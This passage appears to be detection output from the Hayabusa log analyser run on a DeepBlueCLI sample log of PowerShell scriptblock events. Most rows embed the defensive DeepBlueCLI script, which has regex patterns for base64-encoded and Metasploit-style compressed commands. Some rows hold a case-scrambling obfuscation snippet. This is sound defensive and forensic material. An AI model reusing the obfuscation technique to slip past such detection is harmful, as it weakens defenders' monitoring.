# Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" 
{$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. 
$decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. 
# If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:59:31.974 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:59:31.974 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""!"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ! 
characters`n"" } $string2 = $string -replace ""%"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars % characters`n"" } $string2 = $string -replace ""&"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars & characters`n"" } $string2 = $string -replace "">"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars > characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . 
Main",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:59:31.974 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"# Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""!"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ! 
characters`n"" } $string2 = $string -replace ""%"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars % characters`n"" } $string2 = $string -replace ""&"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars & characters`n"" } $string2 = $string -replace "">"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars > characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . 
Main",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:59:31.977 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. 
$groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. 
$servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. 
$pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:59:31.985 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 03:59:31.987 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 04:01:22.441 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 04:01:22.441 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 04:01:22.442 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""!"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ! characters`n"" } $string2 = $string -replace ""%"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars % characters`n"" } $string2 = $string -replace ""&"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars & characters`n"" } $string2 = $string -replace "">"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars > characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 04:01:22.443 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 04:01:28.780 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 04:12:08.894 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 04:12:08.929 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 04:12:08.986 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 04:12:09.026 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 04:12:09.052 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 04:12:09.081 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 04:12:09.119 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 04:12:09.152 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 04:12:09.159 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 04:12:09.176 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
2017-08-31 04:12:09.189 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
